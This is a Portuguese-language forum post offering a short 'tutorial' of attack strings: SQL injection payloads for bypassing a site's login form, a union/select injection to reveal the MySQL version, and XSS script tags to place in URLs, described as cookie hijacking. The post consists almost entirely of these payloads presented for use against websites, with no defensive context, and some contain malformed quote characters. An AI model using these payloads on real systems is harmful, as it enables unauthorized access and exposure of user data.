Super Tuto
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

[Tutorial] - Exemplo de Ataques XSS e de SQL Injection

Ir para baixo

[Tutorial] - Exemplo de Ataques XSS e de SQL Injection Empty [Tutorial] - Exemplo de Ataques XSS e de SQL Injection

Mensagem por SRmasazuka Ter 23 Abr - 5:16


Exemplo de Ataques XSS e de SQL Injection
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]

Vamos aos rápidos exemplos:

Esse código de SQL injection é inserido no campo de Login ou Username de um site, onde faz com que ele se autentique como aquele usuário com uma senha qualquer:


‘or’=1 '
)or('a'='a
‘or=1
')or('1'='1
‘or’a’=‘a
'or'1'='1



e é colocado uma senha como: xxx

Esse código Mostra a versão do Banco de Dados de MYSQL, onde user123 é conhecido pelo Hacker: 'user123' or 1=(select @@version)-- ou ' union select @@version,1,1--


Vamos ao XSS (inserindo na URL):

Sequestrando Cookies:

'"><script>alert('xss');alert(document.cookie)</script> ou
<script>alert('xss');alert(document.cookie)</script>


Fonte: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SRmasazuka
SRmasazuka
Administrator

Mensagens Mensagens : 152
MPoints MPoints : 9645
Idade Idade : 27

Ir para o topo Ir para baixo

Ir para o topo

- Tópicos semelhantes

 
Permissões neste sub-fórum
Não podes responder a tópicos